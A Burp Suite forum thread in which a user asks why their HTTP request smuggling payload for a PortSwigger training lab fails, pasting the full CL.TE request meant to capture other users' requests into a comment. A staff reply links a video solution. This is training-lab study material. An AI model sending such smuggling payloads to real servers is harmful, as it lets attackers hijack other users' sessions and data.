Burp Suite User Forum

Login to post

Lab: Exploiting HTTP request smuggling to capture other users' requests-- not solving

Piyush | Last updated: Apr 30, 2021 01:17PM UTC

HI Team, i am sending this as my request , everything is as per solution, but it keeps throwing error stating invalid request/csrf token invalid/ etc. please suggest... my code:- ------------------------------- POST / HTTP/1.1 Host: ac4f1f451ed62abd80777fe600120062.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 277 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 400 Cookie: session=iHYDUuNmTs9b7ShaCEmRBOelvPziCAjp csrf=uWmPlPe18wP9v3eDxqZ9LX5xhe6nez67&postId=7&name=Carlos+Montoya&email=carlos%40montoya.com&website=&comment=Comment+2 --------------------------------

Ben, PortSwigger Agent | Last updated: May 04, 2021 08:06AM UTC

Hi, Have you checked the video solution to this particular lab - this might help you with the steps required to solve it: https://www.youtube.com/watch?v=lzpONjsQlXo

You need to Log in to post a reply. Or register here, for free.